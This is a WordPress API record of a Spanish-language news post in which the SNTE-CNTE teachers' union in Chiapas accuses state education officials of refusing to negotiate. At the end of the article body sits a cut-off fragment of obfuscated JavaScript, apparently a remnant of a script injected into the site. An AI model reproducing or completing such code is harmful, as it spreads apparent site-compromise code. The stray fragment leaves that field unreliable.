{"id":10843,"date":"2023-07-05T04:15:03","date_gmt":"2023-07-05T04:15:03","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=10843"},"modified":"2023-07-05T04:15:04","modified_gmt":"2023-07-05T04:15:04","slug":"cnte-senala-irregularidades-en-la-sef","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=10843","title":{"rendered":"CNTE se\u00f1ala irregularidades en la SEF"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/07\/FB_IMG_1688530433824-1024x768.jpg\" alt=\"\" class=\"wp-image-10844\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/07\/FB_IMG_1688530433824-1024x768.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/07\/FB_IMG_1688530433824-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/07\/FB_IMG_1688530433824-768x576.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/07\/FB_IMG_1688530433824.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Rodolfo Flores. 4 de julio del 2023. Tuxtla Guti\u00e9rrez. &#8211; Este martes, la direcci\u00f3n pol\u00edtica de la Secci\u00f3n 7 del Sindicato y Coordinadora Nacional de Trabajadores de la Educaci\u00f3n (SNTE-CNTE) acusaron de mantener una cerraz\u00f3n, a los funcionarios de la subsecretar\u00eda de Educaci\u00f3n Federalizada . En este punto de la capital chiapaneca, realizaron una conferencia de prensa para presionar al Gobierno del Estado de Chiapas para tener una mesa de negociaci\u00f3n. El secretario general de la Secci\u00f3n 7 del SNTE-CNTE, Isael Gonz\u00e1lez V\u00e1zquez expuso que a partir de la elecci\u00f3n del nuevo Comit\u00e9 Seccional que rindi\u00f3 protesta el 18 de marzo de este a\u00f1o, \u201cde forma inmediata y legal hicimos llegar una solicitud al Gobierno del Estado para que la representaci\u00f3n sindical sea recibida y pueda plantear las necesidades de los trabajadores hasta hoy no tenemos respuesta\u201d Relat\u00f3 que el 15 de mayo se entreg\u00f3 un pliego petitorio en el cual, de forma desglosada, se plantearon todas las necesidades y las demandas de los trabajadores de la educaci\u00f3n en Chiapas. \u201cNo tenemos ninguna respuesta a pesar de que lo hicimos formal\u201d dijo al tiempo que record\u00f3 que la administraci\u00f3n pasada llevo a cabo 18 mesas de la de negoci\u00f3n y en ninguna se resolvieron los problemas. \u201cYa no hubo mesa 19, se suspendi\u00f3 la interlocuci\u00f3n del Gobierno y ah\u00ed est\u00e1n los problemas, hay muchos maestros cesados, una ola de represi\u00f3n contra los trabajadores y acordamos en la Asamblea Nacional representativa en la Ciudad de M\u00e9xico que estaremos llevando a cabo acciones para exigir al gobierno que pueda atender a la Comisi\u00f3n y resolver los Problemas\u201d Detall\u00f3 que en Chiapas, el d\u00eda de ayer 4 de julio se congel\u00f3 la plaza de los titulares del Comit\u00e9 Seccional, que se suman a las 33 plazas congeladas desde el 2016, sum\u00e1ndose \u201cm\u00e1s de 52 compa\u00f1eros que ya no tienen un salario por pertenecer al Comit\u00e9 a pesar de continuar labores en sus centros de trabajo\u201d<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Rodolfo Flores. 4 de julio del 2023. Tuxtla Guti\u00e9rrez. &#8211; Este martes, la direcci\u00f3n pol\u00edtica de la Secci\u00f3n 7 del Sindicato y Coordinadora Nacional de Trabajadores de la Educaci\u00f3n (SNTE-CNTE) acusaron de mantener una cerraz\u00f3n, a los funcionarios de la subsecretar\u00eda de Educaci\u00f3n Federalizada . En este punto de la capital chiapaneca, realizaron una conferencia &hellip;<\/p>\n","protected":false},"author":2,"featured_media":10844,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-10843","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/10843","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=10843"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/10843\/revisions"}],"predecessor-version":[{"id":10845,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/10843\/revisions\/10845"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/10844"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=10843"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=10843"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=10843"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}